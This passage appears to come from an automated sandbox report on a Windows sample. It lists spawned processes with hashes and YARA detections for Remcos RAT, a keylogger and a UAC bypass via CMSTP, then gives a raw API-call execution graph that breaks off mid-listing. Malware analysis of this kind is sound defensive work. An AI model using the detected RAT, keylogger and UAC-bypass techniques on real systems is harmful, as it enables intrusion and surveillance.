                                      Has exited:true

                                      Target ID:28
                                      Start time:14:12:01
                                      Start date:25/09/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\cmd.exe
                                      Imagebase:0x410000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001C.00000002.2075718056.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001C.00000002.2075718056.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001C.00000002.2075718056.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001C.00000002.2075718056.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                      Has exited:true

                                      Target ID:29
                                      Start time:14:12:01
                                      Start date:25/09/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff75da10000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:32
                                      Start time:14:12:18
                                      Start date:25/09/2024
                                      Path:C:\Windows\SysWOW64\explorer.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\explorer.exe
                                      Imagebase:0xe50000
                                      File size:4'514'184 bytes
                                      MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000020.00000002.2008670032.0000000000459000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000020.00000002.2008670032.0000000000459000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000020.00000002.2008670032.0000000000459000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000020.00000002.2008670032.0000000000459000.00000002.00000001.01000000.00000000.sdmp, Author: unknown
                                      Has exited:true

                                      Target ID:33
                                      Start time:14:12:22
                                      Start date:25/09/2024
                                      Path:C:\Windows\SysWOW64\explorer.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\explorer.exe
                                      Imagebase:0xe50000
                                      File size:4'514'184 bytes
                                      MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000021.00000002.2074816955.0000000000369000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000021.00000002.2074816955.0000000000369000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000021.00000002.2074816955.0000000000369000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000021.00000002.2074816955.0000000000369000.00000002.00000001.01000000.00000000.sdmp, Author: unknown
                                      Has exited:true

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:17.6%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:25.9%
                                        Total number of Nodes:1474
                                        Total number of Limit Nodes:20
                                        execution_graph 9006 410e7f 9007 410e9a 9006->9007 9008 410eb5 9007->9008 9010 40f42d 9007->9010 9011 40f445 free 9010->9011 9012 40f437 9010->9012 9013 4024e7 46 API calls 9011->9013 9012->9011 9014 40f456 9012->9014 9013->9014 9014->9008 10837 411a2d _EH_prolog 10840 4117b9 10837->10840 10839 411a61 10841 4117e9 10840->10841 10842 4117cd 10840->10842 10841->10839 10842->10841 10860 40e58f 10842->10860 10845 40e58f 47 API calls 10846 411801 10845->10846 10846->10841 10847 40e58f 47 API calls 10846->10847 10848 411813 10847->10848 10848->10841 10849 40e58f 47 API calls 10848->10849 10850 411828 10849->10850 10850->10841 10866 40e9b5 10850->10866 10852 41183d 10852->10841 10872 41168a 10852->10872 10854 411a16 10882 40ea88 10854->10882 10857 41164e _CxxThrowException 10859 4118a0 10857->10859 10858 4115a9 memmove _CxxThrowException 10858->10859 10859->10841 10859->10854 10859->10857 10859->10858 10876 4116c7 10859->10876 10861 40e59e 10860->10861 10862 40e5b9 10861->10862 10886 40e556 10861->10886 10862->10841 10862->10845 10865 4024c4 46 API calls 10865->10862 10867 40e9c4 10866->10867 10868 40e9de 10867->10868 10890 40e964 10867->10890 10868->10852 10871 4024c4 46 API calls 10871->10868 10873 411693 10872->10873 10875 4116c4 10873->10875 10894 40e63c 10873->10894 10875->10859 10877 411726 10876->10877 10878 4116df 10876->10878 10879 411709 10877->10879 10881 40e63c _CxxThrowException 10877->10881 10878->10879 10880 40e63c _CxxThrowException 10878->10880 10879->10859 10880->10879 10881->10879 10883 40ea8d 10882->10883 10884 40eaa0 10883->10884 10901 40e9f7 10883->10901 10884->10841 10889 401b1f VirtualFree 10886->10889 10888 40e561 10888->10865 10889->10888 10893 401b1f VirtualFree 10890->10893 10892 40e96e 10892->10871 10893->10892 10897 40e5d3 10894->10897 10898 40e5e1 10897->10898 10899 40e5e5 10897->10899 10898->10873 10899->10898 10900 40e60a _CxxThrowException 10899->10900 10900->10898 10902 40ea0b 10901->10902 10903 40ea30 10902->10903 10904 40ea1c memmove 10902->10904 10903->10883 10904->10903 8238 4096c7 _EH_prolog 8252 4096fa 8238->8252 8239 40971c 8240 409827 8273 40118a 8240->8273 8242 4094e0 _CxxThrowException ??2@YAPAXI memcpy ??3@YAXPAX 8242->8252 8243 409851 8246 40985e ??2@YAPAXI 8243->8246 8244 40983c 8324 409425 8244->8324 8247 409878 8246->8247 8253 4098c2 8247->8253 8254 409925 ??2@YAPAXI 8247->8254 8258 409530 3 API calls 8247->8258 8260 409425 ctype 3 API calls 8247->8260 8262 4099a2 8247->8262 8267 409a65 8247->8267 8283 409fb4 8247->8283 8287 408ea4 8247->8287 8330 409c13 ??2@YAPAXI 8247->8330 8332 409f49 8247->8332 8248 40969d 8 API calls 8248->8252 8250 40e959 VirtualFree ??3@YAXPAX free free ctype 8250->8252 8252->8239 8252->8240 8252->8242 8252->8248 8252->8250 8317 4095b7 8252->8317 8321 409403 8252->8321 8327 409530 8253->8327 8254->8247 8258->8247 8260->8247 8263 409530 3 API calls 8262->8263 8264 4099c7 8263->8264 8265 409425 ctype 3 API calls 8264->8265 8265->8239 8269 409530 3 API calls 8267->8269 8270 409a84 8269->8270 8271 409425 ctype 3 API calls 8270->8271 8271->8239 8274 401198 GetDiskFreeSpaceExW 8273->8274 8275 4011ee SendMessageW 8273->8275 8274->8275 8276 4011b0 8274->8276 8277 4011d6 8275->8277 8276->8275 8278 401f9d 19 API calls 8276->8278 8277->8243 8277->8244 8279 4011c9 8278->8279 8280 407717 25 API calls 8279->8280 8281 4011cf 8280->8281 8281->8277 8282 4011e7 8281->8282 8282->8275 8284 409fdd 8283->8284 8336 409dff 8284->8336 8610 40aef3 8287->8610 8290 408ec1 8290->8247 8292 408fd5 8628 408b7c 8292->8628 8293 408f0d ??2@YAPAXI 8302 408ef5 8293->8302 8295 408f31 ??2@YAPAXI 8295->8302 8302->8292 8302->8293 8302->8295 8671 40cdb8 ??2@YAPAXI 8302->8671 8318 4095c6 8317->8318 8320 4095cc 8317->8320 8318->8252 8319 4095e2 _CxxThrowException 8319->8318 8320->8318 8320->8319 8322 40e8e2 4 API calls 8321->8322 8323 40940b 8322->8323 8323->8252 8325 40e8da ctype 3 API calls 8324->8325 8326 409433 8325->8326 8328 408963 ctype 3 API calls 8327->8328 8329 40953b 8328->8329 8331 409c45 8330->8331 8331->8247 8334 409f4e 8332->8334 8333 409f75 8333->8247 8334->8333 8335 409cde 110 API calls 8334->8335 8335->8334 8339 409e04 8336->8339 8337 409e3a 8337->8247 8339->8337 8340 409cde 8339->8340 8341 409cf8 8340->8341 8345 401626 8341->8345 8408 40db1f 8341->8408 8342 409d2c 8342->8339 8346 401642 8345->8346 8352 401638 8345->8352 8411 40a62f _EH_prolog 8346->8411 8348 40166f 8455 40eca9 8348->8455 8349 401411 2 API calls 8351 401688 8349->8351 8353 401962 ??3@YAXPAX 8351->8353 8354 40169d 8351->8354 8352->8342 8358 40eca9 VariantClear 8353->8358 8437 401329 8354->8437 8357 4016a8 8441 401454 8357->8441 8358->8352 8361 401362 2 API calls 8362 4016c7 ??3@YAXPAX 8361->8362 8367 4016d9 8362->8367 8394 401928 ??3@YAXPAX 8362->8394 8364 40eca9 VariantClear 8364->8352 8365 4016fa 8366 40eca9 VariantClear 8365->8366 8368 401702 ??3@YAXPAX 8366->8368 8367->8365 8369 401764 8367->8369 8382 401725 8367->8382 8368->8348 8372 4017a2 8369->8372 8373 401789 8369->8373 8370 40eca9 VariantClear 8371 401737 ??3@YAXPAX 8370->8371 8371->8348 8375 4017c4 GetLocalTime SystemTimeToFileTime 8372->8375 8376 4017aa 8372->8376 8374 40eca9 VariantClear 8373->8374 8377 401791 ??3@YAXPAX 8374->8377 8375->8376 8378 4017e1 8376->8378 8379 4017f8 8376->8379 8376->8382 8377->8348 8459 403354 lstrlenW 8378->8459 8446 40301a GetFileAttributesW 8379->8446 8382->8370 8384 401934 GetLastError 8384->8394 8385 401818 ??2@YAPAXI 8387 401824 8385->8387 8386 40192a 8386->8384 8483 40db53 8387->8483 8390 40190f 8393 40eca9 VariantClear 8390->8393 8391 40185f GetLastError 8486 4012f7 8391->8486 8393->8394 8394->8364 8395 401871 8396 403354 86 API calls 8395->8396 8399 40187f ??3@YAXPAX 8395->8399 8397 4018cc 8396->8397 8397->8399 8401 40db53 2 API calls 8397->8401 8400 40189c 8399->8400 8402 40eca9 VariantClear 8400->8402 8403 4018f1 8401->8403 8404 4018aa ??3@YAXPAX 8402->8404 8405 4018f5 GetLastError 8403->8405 8406 401906 ??3@YAXPAX 8403->8406 8404->8348 8405->8399 8406->8390 8602 40da56 8408->8602 8412 40a738 8411->8412 8413 40a66a 8411->8413 8414 40a687 8412->8414 8415 40a73d 8412->8415 8413->8414 8416 40a704 8413->8416 8417 40a679 8413->8417 8423 40a6ad 8414->8423 8515 40a3b0 8414->8515 8420 40a747 8415->8420 8422 40a699 8415->8422 8424 40a6f2 8415->8424 8416->8423 8489 40e69c 8416->8489 8418 40a67e 8417->8418 8417->8424 8427 40a684 8418->8427 8435 40a6b2 8418->8435 8420->8424 8420->8435 8422->8423 8503 40ed59 8422->8503 8498 40ecae 8423->8498 8511 40ed34 8424->8511 8426 40a71a 8492 40eced 8426->8492 8427->8414 8427->8422 8433 40eca9 VariantClear 8434 40166b 8433->8434 8434->8348 8434->8349 8435->8423 8507 40ed79 8435->8507 8438 401340 8437->8438 8439 40112b 2 API calls 8438->8439 8440 40134b 8439->8440 8440->8357 8442 4012f7 2 API calls 8441->8442 8443 401462 8442->8443 8530 4013e2 8443->8530 8445 40146d 8445->8361 8447 403037 8446->8447 8453 401804 8446->8453 8448 403048 8447->8448 8449 40303b SetLastError 8447->8449 8450 403051 8448->8450 8452 40305f FindFirstFileW 8448->8452 8448->8453 8449->8453 8533 402fed 8450->8533 8452->8450 8454 403072 FindClose CompareFileTime 8452->8454 8453->8384 8453->8385 8453->8386 8454->8450 8454->8453 8456 40ec65 8455->8456 8457 40ec86 VariantClear 8456->8457 8458 40ec9d 8456->8458 8457->8352 8458->8352 8460 4024fc 2 API calls 8459->8460 8461 403375 8460->8461 8462 40112b 2 API calls 8461->8462 8465 403385 8461->8465 8462->8465 8464 4033d3 GetSystemTimeAsFileTime GetFileAttributesW 8466 4033e8 8464->8466 8467 4033f2 8464->8467 8465->8464 8474 403477 8465->8474 8574 401986 CreateDirectoryW 8465->8574 8468 40301a 22 API calls 8466->8468 8469 401986 4 API calls 8467->8469 8479 4033f8 ??3@YAXPAX 8467->8479 8468->8467 8482 403405 8469->8482 8470 4034a7 8471 407776 55 API calls 8470->8471 8477 4034b1 ??3@YAXPAX 8471->8477 8472 40340a 8580 407776 8472->8580 8474->8470 8474->8479 8475 40346b ??3@YAXPAX 8480 4034bc 8475->8480 8476 40341d memcpy 8476->8482 8477->8480 8479->8480 8480->8382 8481 401986 4 API calls 8481->8482 8482->8472 8482->8475 8482->8476 8482->8481 8599 40db3c 8483->8599 8487 40112b 2 API calls 8486->8487 8488 401311 8487->8488 8488->8395 8490 4012f7 2 API calls 8489->8490 8491 40e6a9 8490->8491 8491->8426 8519 40ecd7 8492->8519 8495 40ed12 8496 40a726 ??3@YAXPAX 8495->8496 8497 40ed17 _CxxThrowException 8495->8497 8496->8423 8497->8496 8522 40ec65 8498->8522 8500 40ecba 8501 40a7b2 8500->8501 8502 40ecbe memcpy 8500->8502 8501->8433 8502->8501 8504 40ed62 8503->8504 8505 40ed67 8503->8505 8506 40ecd7 VariantClear 8504->8506 8505->8423 8506->8505 8508 40ed82 8507->8508 8509 40ed87 8507->8509 8510 40ecd7 VariantClear 8508->8510 8509->8423 8510->8509 8512 40ed42 8511->8512 8513 40ed3d 8511->8513 8512->8423 8514 40ecd7 VariantClear 8513->8514 8514->8512 8516 40a3c2 8515->8516 8517 40a3de 8516->8517 8526 40eda0 8516->8526 8517->8423 8520 40eca9 VariantClear 8519->8520 8521 40ecdf SysAllocString 8520->8521 8521->8495 8521->8496 8523 40ec6d 8522->8523 8524 40ec86 VariantClear 8523->8524 8525 40ec9d 8523->8525 8524->8500 8525->8500 8527 40edae 8526->8527 8528 40eda9 8526->8528 8527->8517 8529 40ecd7 VariantClear 8528->8529 8529->8527 8531 401398 2 API calls 8530->8531 8532 4013f2 8531->8532 8532->8445 8539 402c86 8533->8539 8535 402ff6 8536 403017 8535->8536 8537 402ffb GetLastError 8535->8537 8536->8453 8538 403006 8537->8538 8538->8453 8540 402c93 GetFileAttributesW 8539->8540 8541 402c8f 8539->8541 8542 402ca4 8540->8542 8543 402ca9 8540->8543 8541->8535 8542->8535 8544 402cc7 8543->8544 8545 402cad SetFileAttributesW 8543->8545 8550 402b79 8544->8550 8547 402cc3 8545->8547 8548 402cba DeleteFileW 8545->8548 8547->8535 8548->8535 8551 4024fc 2 API calls 8550->8551 8552 402b90 8551->8552 8553 40254d 2 API calls 8552->8553 8554 402b9d FindFirstFileW 8553->8554 8555 402c55 SetFileAttributesW 8554->8555 8570 402bbf 8554->8570 8557 402c60 RemoveDirectoryW 8555->8557 8558 402c78 ??3@YAXPAX 8555->8558 8556 401329 2 API calls 8556->8570 8557->8558 8559 402c6d ??3@YAXPAX 8557->8559 8560 402c80 8558->8560 8559->8560 8560->8535 8562 40254d 2 API calls 8562->8570 8563 402c24 SetFileAttributesW 8563->8558 8567 402c2d DeleteFileW 8563->8567 8564 402bef lstrcmpW 8565 402c05 lstrcmpW 8564->8565 8566 402c38 FindNextFileW 8564->8566 8565->8566 8565->8570 8568 402c4e FindClose 8566->8568 8566->8570 8567->8570 8568->8555 8569 402b79 2 API calls 8569->8570 8570->8556 8570->8558 8570->8562 8570->8563 8570->8564 8570->8566 8570->8569 8571 401429 8570->8571 8572 401398 2 API calls 8571->8572 8573 401433 8572->8573 8573->8570 8575 4019c7 8574->8575 8576 401997 GetLastError 8574->8576 8575->8465 8577 4019b1 GetFileAttributesW 8576->8577 8579 4019a6 8576->8579 8577->8575 8577->8579 8578 4019a7 SetLastError 8578->8465 8579->8575 8579->8578 8581 401f9d 19 API calls 8580->8581 8582 40778a wvsprintfW 8581->8582 8583 407859 8582->8583 8584 4077ab GetLastError FormatMessageW 8582->8584 8587 4076a8 25 API calls 8583->8587 8585 4077d9 FormatMessageW 8584->8585 8586 4077ee lstrlenW lstrlenW ??2@YAPAXI lstrcpyW lstrcpyW 8584->8586 8585->8583 8585->8586 8591 4076a8 8586->8591 8590 407865 8587->8590 8590->8479 8592 407715 ??3@YAXPAX LocalFree 8591->8592 8593 4076b7 8591->8593 8592->8590 8594 40661a 2 API calls 8593->8594 8595 4076c6 IsWindow 8594->8595 8596 4076ef 8595->8596 8597 4076dd IsBadReadPtr 8595->8597 8598 4073d1 21 API calls 8596->8598 8597->8596 8598->8592 8600 40db1f 2 API calls 8599->8600 8601 401857 8600->8601 8601->8390 8601->8391 8607 40d985 8602->8607 8605 40da65 CreateFileW 8606 40da8a 8605->8606 8606->8342 8608 40d98f CloseHandle 8607->8608 8609 40d99a 8607->8609 8608->8609 8609->8605 8609->8606 8611 40af0c 8610->8611 8626 408ebd 8610->8626 8611->8626 8701 40ac7a 8611->8701 8613 40af3f 8614 40ac7a 7 API calls 8613->8614 8615 40b0cb 8613->8615 8619 40af96 8614->8619 8617 40e959 ctype 4 API calls 8615->8617 8616 40afbd 8708 40e959 8616->8708 8617->8626 8619->8615 8619->8616 8620 40b043 8621 40e959 ctype 4 API calls 8620->8621 8624 40b07f 8621->8624 8622 408761 _CxxThrowException ??2@YAPAXI memcpy ??3@YAXPAX 8623 40afc6 8622->8623 8623->8620 8623->8622 8625 40e959 ctype 4 API calls 8624->8625 8625->8626 8626->8290 8627 4065ea InitializeCriticalSection 8626->8627 8627->8302 8720 4086f0 8628->8720 8672 40cdc7 8671->8672 8673 408761 4 API calls 8672->8673 8674 40cdde 8673->8674 8674->8302 8702 40e8da ctype 3 API calls 8701->8702 8703 40ac86 8702->8703 8712 40e811 8703->8712 8705 40aca2 8705->8613 8706 409403 4 API calls 8707 40ac90 8706->8707 8707->8705 8707->8706 8709 40e93b 8708->8709 8710 40e8da ctype 3 API calls 8709->8710 8711 40e943 ??3@YAXPAX 8710->8711 8711->8623 8713 40e8a5 8712->8713 8714 40e824 8712->8714 8713->8707 8715 40e833 _CxxThrowException 8714->8715 8716 40e863 ??2@YAPAXI 8714->8716 8717 40e895 ??3@YAXPAX 8714->8717 8715->8714 8716->8714 8718 40e879 memcpy 8716->8718 8717->8713 8718->8717 8721 40e8da ctype 3 API calls 8720->8721 8722 4086f8 8721->8722 8723 40e8da ctype 3 API calls 8722->8723 8724 408700 8723->8724 8725 40e8da ctype 3 API calls 8724->8725 8726 408708 8725->8726 9015 40dace 9018 40daac 9015->9018 9021 40da8f 9018->9021 9022 40da56 2 API calls 9021->9022 9023 40daa9 9022->9023 9005 40dadc ReadFile 9024 411def __set_app_type __p__fmode __p__commode 9025 411e5e 9024->9025 9026 411e72 9025->9026 9027 411e66 __setusermatherr 9025->9027 9036 411f66 _controlfp 9026->9036 9027->9026 9029 411e77 _initterm __getmainargs _initterm 9030 411ecb GetStartupInfoA 9029->9030 9032 411eff GetModuleHandleA 9030->9032 9037 4064af _EH_prolog 9032->9037 9036->9029 9040 404faa 9037->9040 9345 401b37 GetModuleHandleW CreateWindowExW 9040->9345 9043 404fdc 9044 40648e MessageBoxA 9043->9044 9046 404ff6 9043->9046 9045 4064a5 exit _XcptFilter 9044->9045 9047 401411 2 API calls 9046->9047 9048 40502d 9047->9048 9049 401411 2 API calls 9048->9049 9050 405035 9049->9050 9348 403e23 9050->9348 9055 40254d 2 API calls 9056 405073 9055->9056 9357 402a69 9056->9357 9058 40507c 9371 403d71 9058->9371 9061 40509b _wtol 9063 4050b1 9061->9063 9376 404405 9063->9376 9064 4050d6 9065 403d71 6 API calls 9064->9065 9066 4050e1 9065->9066 9067 4050e7 9066->9067 9068 405118 9066->9068 9543 404996 9067->9543 9069 405130 GetModuleFileNameW 9068->9069 9071 40112b 2 API calls 9068->9071 9072 405151 9069->9072 9073 405142 9069->9073 9071->9069 9078 403d71 6 API calls 9072->9078 9075 407776 55 API calls 9073->9075 9074 4050ee ??3@YAXPAX 9561 403e70 9074->9561 9083 4050ec 9075->9083 9077 4050ff ??3@YAXPAX ??3@YAXPAX 9077->9045 9090 405173 9078->9090 9079 4052d5 9080 401362 2 API calls 9079->9080 9081 4052e5 9080->9081 9082 401362 2 API calls 9081->9082 9087 4052f2 9082->9087 9083->9074 9084 4051fa 9084->9083 9085 40522a 9084->9085 9089 405213 _wtol 9084->9089 9086 403d71 6 API calls 9085->9086 9095 405289 9086->9095 9088 40538d ??2@YAPAXI 9087->9088 9091 401329 2 API calls 9087->9091 9097 405399 9088->9097 9089->9085 9090->9079 9090->9083 9090->9084 9090->9085 9094 401429 2 API calls 9090->9094 9092 405327 9091->9092 9093 401329 2 API calls 9092->9093 9099 40533d 9093->9099 9094->9090 9095->9079 9096 404594 2 API calls 9095->9096 9098 4052ba 9096->9098 9100 4053cf 9097->9100 9104 407776 55 API calls 9097->9104 9098->9079 9102 401362 2 API calls 9098->9102 9103 401362 2 API calls 9099->9103 9401 4025ae 9100->9401 9102->9079 9106 405367 9103->9106 9104->9100 9108 401f9d 19 API calls 9106->9108 9107 4025ae 2 API calls 9110 4053f6 9107->9110 9109 40536e 9108->9109 9111 40254d 2 API calls 9109->9111 9112 4025ae 2 API calls 9110->9112 9113 405377 9111->9113 9114 4053fe 9112->9114 9113->9088 9404 404e3f 9114->9404 9119 40546f 9121 405534 9119->9121 9124 403d71 6 API calls 9119->9124 9120 402844 10 API calls 9122 405441 9120->9122 9123 40e8da ctype 3 API calls 9121->9123 9122->9119 9127 407776 55 API calls 9122->9127 9125 40553c 9123->9125 9126 405493 9124->9126 9128 405573 9125->9128 9592 403093 9125->9592 9126->9121 9134 40549d 9126->9134 9129 405450 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9127->9129 9131 405506 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9128->9131 9132 40557c 9128->9132 9129->9119 9131->9074 9131->9083 9136 405588 wsprintfW 9132->9136 9137 4055ed 9132->9137 9143 401411 2 API calls 9132->9143 9144 401329 ??2@YAPAXI ??3@YAXPAX 9132->9144 9147 401f9d 19 API calls 9132->9147 9626 402f6c ??2@YAPAXI 9132->9626 9632 402425 ??3@YAXPAX ??3@YAXPAX 9132->9632 9134->9131 9566 404cbc 9134->9566 9135 405556 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9138 4054f5 9135->9138 9139 401411 2 API calls 9136->9139 9432 404603 9137->9432 9138->9131 9139->9132 9142 4054cc 9142->9131 9145 407776 55 API calls 9142->9145 9143->9132 9144->9132 9146 4054da ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9145->9146 9146->9138 9147->9132 9148 40584a 9149 404603 26 API calls 9148->9149 9182 40586a 9149->9182 9151 403b94 lstrlenW lstrlenW _wcsnicmp 9176 4055f6 9151->9176 9154 405933 9494 404034 9154->9494 9155 4024fc 2 API calls 9155->9182 9159 4059d8 CoInitialize 9166 40243b lstrcmpW 9159->9166 9160 40595a 9163 40243b lstrcmpW 9160->9163 9161 405935 ??3@YAXPAX 9161->9154 9165 405969 9163->9165 9164 401411 ??2@YAPAXI ??3@YAXPAX 9164->9182 9167 405979 9165->9167 9169 401f9d 19 API calls 9165->9169 9168 4059fe 9166->9168 9659 403b40 9167->9659 9170 405a12 9168->9170 9173 401329 2 API calls 9168->9173 9169->9167 9500 403b59 9170->9500 9172 401362 2 API calls 9172->9182 9173->9170 9176->9148 9176->9151 9192 4057dd _wtol 9176->9192 9208 405878 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9176->9208 9633 40484d 9176->9633 9644 40408b 9176->9644 9178 4073d1 21 API calls 9181 40599c ctype 9178->9181 9179 401329 2 API calls 9179->9182 9180 405a4d 9184 405a2b ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9180->9184 9222 405a61 9180->9222 9679 4082e9 9180->9679 9185 4059a7 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9181->9185 9182->9154 9182->9155 9182->9161 9182->9164 9182->9172 9182->9179 9187 402f6c 7 API calls 9182->9187 9491 40243b 9182->9491 9658 402425 ??3@YAXPAX ??3@YAXPAX 9182->9658 9184->9180 9185->9083 9187->9182 9189 405910 ??3@YAXPAX 9189->9182 9190 401411 2 API calls 9190->9222 9192->9176 9193 405bd8 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9213 405bf3 9193->9213 9194 405a9f GetKeyState 9194->9222 9195 405c6c 9197 405ca2 9195->9197 9198 405c74 9195->9198 9196 40243b lstrcmpW 9196->9222 9201 4012f7 2 API calls 9197->9201 9721 403f85 9198->9721 9202 405cb0 9201->9202 9205 403b59 15 API calls 9202->9205 9209 405cb9 9205->9209 9206 407776 55 API calls 9210 405c13 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9206->9210 9207 401362 2 API calls 9211 405c91 ??3@YAXPAX 9207->9211 9208->9083 9212 405cca ??3@YAXPAX 9209->9212 9216 401362 2 API calls 9209->9216 9210->9213 9217 405cd9 9211->9217 9212->9217 9213->9206 9214 405c4a ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9213->9214 9214->9213 9215 405bcd ??3@YAXPAX 9215->9222 9216->9212 9219 405d24 9217->9219 9220 405d16 9217->9220 9218 401329 ??2@YAPAXI ??3@YAXPAX 9218->9222 9734 40786b 9219->9734 9507 404a44 9220->9507 9222->9190 9222->9193 9222->9194 9222->9195 9222->9196 9222->9213 9222->9214 9222->9215 9222->9218 9224 401429 ??2@YAPAXI ??3@YAXPAX 9222->9224 9706 407613 9222->9706 9715 407674 9222->9715 9224->9222 9225 405d20 9226 405d65 9225->9226 9740 403e0d 9225->9740 9227 404034 21 API calls 9226->9227 9229 405d77 9227->9229 9231 401411 2 API calls 9229->9231 9232 406373 9229->9232 9233 405d95 9231->9233 9234 4063f7 ctype 9232->9234 9237 40243b lstrcmpW 9232->9237 9277 405da8 9233->9277 9744 40453e 9233->9744 9236 40643a ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9234->9236 9242 40243b lstrcmpW 9234->9242 9239 406461 9236->9239 9240 406467 ??3@YAXPAX 9236->9240 9238 4063a4 9237->9238 9238->9234 9761 403f48 9238->9761 9239->9240 9241 403e70 ctype 4 API calls 9240->9241 9243 406478 ??3@YAXPAX ??3@YAXPAX 9241->9243 9245 406416 9242->9245 9243->9045 9244 401411 ??2@YAPAXI ??3@YAXPAX 9244->9277 9245->9236 9249 406423 9245->9249 9248 405dd8 9252 405de5 9248->9252 9253 4061fa ??3@YAXPAX ??3@YAXPAX 9248->9253 9250 4012f7 2 API calls 9249->9250 9255 406432 9250->9255 9251 4073d1 21 API calls 9256 4063e0 ??3@YAXPAX 9251->9256 9753 4043c6 9252->9753 9257 406312 9253->9257 9254 40243b lstrcmpW 9254->9277 9766 404aff 9255->9766 9256->9234 9260 40636a ??3@YAXPAX 9257->9260 9263 404034 21 API calls 9257->9263 9259 405e45 9265 401329 2 API calls 9259->9265 9260->9232 9268 406321 9263->9268 9269 405e4e 9265->9269 9266 4043c6 2 API calls 9267 405e0e 9266->9267 9270 401362 2 API calls 9267->9270 9533 4048ab 9268->9533 9274 403b7f 19 API calls 9269->9274 9275 405e1a ??3@YAXPAX ??3@YAXPAX GetFileAttributesW 9270->9275 9272 40626b ??3@YAXPAX ??3@YAXPAX 9272->9257 9273 401329 2 API calls 9273->9277 9290 405e57 9274->9290 9278 406211 9275->9278 9279 405e41 9275->9279 9276 40633a SetCurrentDirectoryW 9280 4048ab 4 API calls 9276->9280 9277->9244 9277->9248 9277->9254 9277->9259 9277->9272 9277->9273 9281 401429 2 API calls 9277->9281 9284 403e0d 16 API calls 9278->9284 9279->9259 9282 406362 9280->9282 9283 405ee5 ??3@YAXPAX ??3@YAXPAX 9281->9283 9285 403e0d 16 API calls 9282->9285 9283->9277 9286 406216 9284->9286 9285->9260 9287 407776 55 API calls 9286->9287 9288 40621f 7 API calls 9287->9288 9289 40625e 9288->9289 9289->9272 9291 405f61 _wtol 9290->9291 9292 403bce lstrlenW lstrlenW _wcsnicmp 9290->9292 9293 406025 9290->9293 9291->9290 9292->9290 9294 406080 9293->9294 9295 40602e 9293->9295 9296 401362 2 API calls 9294->9296 9297 406053 9295->9297 9298 406034 9295->9298 9299 40607e 9296->9299 9301 401329 2 API calls 9297->9301 9300 401329 2 API calls 9298->9300 9302 40254d 2 API calls 9299->9302 9303 40603f 9300->9303 9304 406051 